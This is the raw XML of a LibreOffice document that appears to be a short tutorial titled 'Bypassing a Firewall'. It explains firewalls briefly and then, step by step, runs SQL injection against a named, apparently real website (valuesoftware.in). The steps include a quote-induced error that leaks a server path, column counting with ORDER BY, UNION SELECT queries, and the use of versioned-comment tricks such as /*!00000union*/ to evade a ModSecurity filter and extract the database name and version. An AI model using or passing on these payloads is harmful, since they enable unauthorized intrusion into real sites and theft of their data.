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Pictures/10000201000007800000043858E568E797867155.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/1000020100000780000004387AF40B85F7A0412C.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/100002010000078000000438438C7F0F6ACE3A51.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/100002010000078000000438DC8734EBEF2D9AA2.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/10000201000007800000043886A72222D6B5A451.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/100002010000078000000438C3FDD6D94F16E863.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/1000020100000780000004388CDB72E9889A33EC.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/100002010000078000000438E5F5CB99B4454F15.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="layout-cache" manifest:media-type="application/binary"/>
  <manifest:file-entry manifest:full-path="Thumbnails/thumbnail.png" manifest:media-type="image/png"/>
</manifest:manifest>
</file>

<file path=content.xml><?xml version="1.0" encoding="utf-8"?>
<office:document-content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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:css3t="http://www.w3.org/TR/css3-text/" xmlns:officeooo="http://openoffice.org/2009/office" office:version="1.3">
  <office:scripts/>
  <office:font-face-decls>
    <style:font-face style:name="Lucida Sans1" svg:font-family="'Lucida Sans'" style:font-family-generic="swiss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ucida Sans" svg:font-family="'Lucida Sans'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</office:font-face-decls>
  <office:automatic-styles>
    <style:style style:name="P1" style:family="paragraph" style:parent-style-name="Standard">
      <style:text-properties fo:font-size="20pt" fo:font-weight="bold" officeooo:rsid="001dafa2" officeooo:paragraph-rsid="001dafa2" style:font-size-asian="20pt" style:font-weight-asian="bold" style:font-size-complex="20pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph" style:parent-style-name="Standard">
      <style:text-properties fo:font-size="18pt" fo:font-weight="normal" officeooo:rsid="001dafa2" officeooo:paragraph-rsid="001dafa2" style:font-size-asian="15.75pt" style:font-weight-asian="normal" style:font-size-complex="18pt" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph" style:parent-style-name="Standard">
      <style:text-properties fo:font-size="18pt" fo:font-weight="normal" officeooo:rsid="001f3462" officeooo:paragraph-rsid="001f3462" style:font-size-asian="15.75pt" style:font-weight-asian="normal" style:font-size-complex="18pt" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Standard">
      <style:text-properties fo:font-size="18pt" fo:font-weight="normal" officeooo:rsid="00202044" officeooo:paragraph-rsid="00202044" style:font-size-asian="15.75pt" style:font-weight-asian="normal" style:font-size-complex="18pt" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="T1" style:family="text">
      <style:text-properties fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties officeooo:rsid="001f3462"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties officeooo:rsid="00202044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text:s text:c="25"/>
        Bypassing a Firewall
      </text:p>
      <text:p text:style-name="P1"/>
      <text:p text:style-name="P2">what is Firewall ?</text:p>
      <text:p text:style-name="P2">
        A firewall is a 
        <text:a xlink:type="simple" xlink:href="https://www.forcepoint.com/cyber-edu/network-security" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">network security</text:a>
         device that monitors incoming and outgoing network traffic and permits or blocks data 
        <text:a xlink:type="simple" xlink:href="https://www.forcepoint.com/cyber-edu/packet-loss" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">packets</text:a>
         based on a set of security rules. Its purpose is to establish a barrier between your internal network and incoming traffic from external sources (such as the internet) in order to block malicious traffic like viruses and hackers. 
      </text:p>
      <text:p text:style-name="P2"/>
      <text:p text:style-name="P2">Types of Firewall ?</text:p>
      <text:p text:style-name="P2"/>
      <text:p text:style-name="P2">1.Host based firewall</text:p>
      <text:p text:style-name="P2">2.Network based firewall</text:p>
      <text:p text:style-name="P2"/>
      <text:p text:style-name="P2">following steps will bypass the firewall :-</text:p>
      <text:p text:style-name="P2"/>
      <text:p text:style-name="P2">target :- valuesoftware.in </text:p>
      <text:p text:style-name="P2">
        <draw:frame draw:style-name="fr1" draw:name="Image1" text:anchor-type="char" svg:x="-0.1583in" svg:y="0.4543in" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="0">
          <draw:image xlink:href="Pictures/1000020100000780000004387AF40B85F7A0412C.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
        1.
        <text:a xlink:type="simple" xlink:href="http://valuesoftware.in/index.php?id=35" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://valuesoftware.in/index.php?id=35</text:a>
      </text:p>
      <text:p text:style-name="P2">
        <text:soft-page-break/>
        2.
        <text:a xlink:type="simple" xlink:href="http://valuesoftware.in/index.php?id=35%27" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://valuesoftware.in/index.php?id=35%27</text:a>
      </text:p>
      <text:p text:style-name="P2"/>
      <text:p text:style-name="P2">
        <text:span text:style-name="T1">Warning</text:span>
        : mysqli_error() expects exactly 1 parameter, 0 given in 
        <text:span text:style-name="T1">/home/value55n/public_html/database.php</text:span>
         on line 
        <text:span text:style-name="T1">5</text:span>
      </text:p>
      <text:p text:style-name="P2">
        <draw:frame draw:style-name="fr2" draw:name="Image2" text:anchor-type="char" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="1">
          <draw:image xlink:href="Pictures/10000201000007800000043886A72222D6B5A451.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
      </text:p>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4">
        <text:soft-page-break/>
        3. 
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35%27%20order%20by%2010--" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.valuesoftware.in/index.php?id=-35%27%20order%20by%2010--</text:a>
        +
      </text:p>
      <text:p text:style-name="P4">
        <draw:frame draw:style-name="fr1" draw:name="Image6" text:anchor-type="char" svg:x="0in" svg:y="0.598in" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="5">
          <draw:image xlink:href="Pictures/100002010000078000000438C3FDD6D94F16E863.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
      </text:p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>
        <text:soft-page-break/>
        <text:span text:style-name="T3">4</text:span>
        . 
        <text:s/>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=35%27%20union%20select%201,2,3,4,5,6,7,8,9,databse()%20--" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.valuesoftware.in/index.php?id=35%27%20union%20select%201,2,3,4,5,6,7,8,9,databse()%20--</text:a>
        +
      </text:p>
      <text:p text:style-name="P2">
        <draw:frame draw:style-name="fr1" draw:name="Image3" text:anchor-type="char" svg:x="-0.0835in" svg:y="0.1752in" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="2">
          <draw:image xlink:href="Pictures/1000020100000780000004388CDB72E9889A33EC.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
      </text:p>
      <text:p text:style-name="P3">it is mod security firewall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>
        <text:soft-page-break/>
        <text:span text:style-name="T3">5</text:span>
        . 
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=35" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.valuesoftware.in/index.php?id=35</text:a>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=35%27%20/*!00000union*/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"> /*!00000union*/</text:a>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=35%27%20/*!00000union*/%20select" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"> select</text:a>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35%27%20/*!00000union*/%20select%201,2,3,4,5,6,7,8,9,10--" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"> 1,2,3,4,5,6,7,8,9,10--</text:a>
        +
      </text:p>
      <text:p text:style-name="P3">
        <draw:frame draw:style-name="fr2" draw:name="Image4" text:anchor-type="char" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="3">
          <draw:image xlink:href="Pictures/100002010000078000000438DC8734EBEF2D9AA2.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
      </text:p>
      <text:p text:style-name="P3">Here we added the commented the union keyword , because union keyword is not allowed in the firewall , now we can enter.</text:p>
      <text:p text:style-name="P3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>
        <text:soft-page-break/>
        6. 
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35%27%20/*!00000union*/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">
          <text:span text:style-name="T2">http://www.valuesoftware.in/index.php?id=-35%27%20/*!00000union*/</text:span>
        </text:a>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35%27%20/*!00000union*/%20select%201,2,3,4,5,6,7,8,9,10--" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">
          <text:span text:style-name="T2"> select 1,2,3,4,5,6,7,8,9,10--</text:span>
        </text:a>
        <text:span text:style-name="T2">+</text:span>
      </text:p>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4">
        <draw:frame draw:style-name="fr3" draw:name="Image5" text:anchor-type="char" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="4">
          <draw:image xlink:href="Pictures/100002010000078000000438438C7F0F6ACE3A51.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
      </text:p>
      <text:p text:style-name="P4">
        7. 
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.valuesoftware.in/index.php?id=-35</text:a>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35%27%20/*!00000union*/%20select%201,2,3,4,5,6,7,8,9,version()%20--" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"> /*00000union*/ select 1,2,3,4,5,6,7,8,9,database()--</text:a>
        +
      </text:p>
      <text:p text:style-name="P4">
        <draw:frame draw:style-name="fr2" draw:name="Image7" text:anchor-type="char" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="6">
          <draw:image xlink:href="Pictures/100002010000078000000438E5F5CB99B4454F15.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
        <text:soft-page-break/>
      </text:p>
      <text:p text:style-name="P4">
        8. 
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.valuesoftware.in/index.php?id=-35</text:a>
        <text:a xlink:type="simple" xlink:href="http://www.valuesoftware.in/index.php?id=-35%27%20/*!00000union*/%20select%201,2,3,4,5,6,7,8,9,version()%20--" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"> /*00000union*/ select 1,2,3,4,5,6,7,8,9,version()--</text:a>
        +
      </text:p>
      <text:p text:style-name="P4">
        <draw:frame draw:style-name="fr1" draw:name="Image8" text:anchor-type="char" svg:x="0.0083in" svg:y="0.2646in" svg:width="6.9252in" svg:height="3.8953in" draw:z-index="7">
          <draw:image xlink:href="Pictures/10000201000007800000043858E568E797867155.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/>
        </draw:frame>
      </text:p>
      <text:p text:style-name="P4">
        <text:soft-page-break/>
      </text:p>
      <text:p text:style-name="P4"/>
    </office:text>
  </office:body>
</office:document-content>
</file>

<file path=meta.xml><?xml version="1.0" encoding="utf-8"?>
<office:document-meta xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" office:version="1.3">
  <office:meta>
    <meta:creation-date>2020-12-14T16:46:14.765000000</meta:creation-date>
    <dc:date>2020-12-14T17:29:15.226000000</dc:date>
    <meta:editing-duration>PT2M29S</meta:editing-duration>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:generator>LibreOffice/7.0.3.1$Windows_X86_64 LibreOffice_project/d7547858d014d4cf69878db179d326fc3483e082</meta:generator>
    <meta:document-statistic meta:table-count="0" meta:image-count="8" meta:object-count="0" meta:page-count="8" meta:paragraph-count="19" meta:word-count="157" meta:character-count="1467" meta:non-whitespace-character-count="1306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186951</config:config-item>
      <config:config-item config:name="ViewAreaLeft" config:type="long">0</config:config-item>
      <config:config-item config:name="ViewAreaWidth" config:type="long">39181</config:config-item>
      <config:config-item config:name="ViewAreaHeight" config:type="long">18057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10795</config:config-item>
          <config:config-item config:name="ViewTop" config:type="long">202318</config:config-item>
          <config:config-item config:name="VisibleLeft" config:type="long">0</config:config-item>
          <config:config-item config:name="VisibleTop" config:type="long">186951</config:config-item>
          <config:config-item config:name="VisibleRight" config:type="long">39180</config:config-item>
          <config:config-item config:name="VisibleBottom" config:type="long">205006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MsWordCompMinLineHeightByFly" config:type="boolean">false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1945506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2306407</config:config-item>
      <config:config-item config:name="MsWordCompTrailingBlanks" config:type="boolean">false</config:config-item>
      <config:config-item config:name="MathBaselineAlignment" config:type="boolean">true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html="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:css3t="http://www.w3.org/TR/css3-text/" xmlns:officeooo="http://openoffice.org/2009/office" office:version="1.3">
  <office:font-face-decls>
    <style:font-face style:name="Lucida Sans1" svg:font-family="'Lucida Sans'" style:font-family-generic="swiss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ucida Sans" svg:font-family="'Lucida Sans'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SimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Lucida Sans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SimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Lucida Sans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Lucida Sans" style:font-family-complex="'Lucida Sans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ucida Sans1" style:font-family-complex="'Lucida Sans'" style:font-family-generic-complex="swiss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ucida Sans1" style:font-family-complex="'Lucida Sans'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ucida Sans1" style:font-family-complex="'Lucida Sans'" style:font-family-generic-complex="swiss"/>
    </style:style>
    <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
      <style:text-properties fo:color="#000080" loext:opacity="100%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footnote-max-height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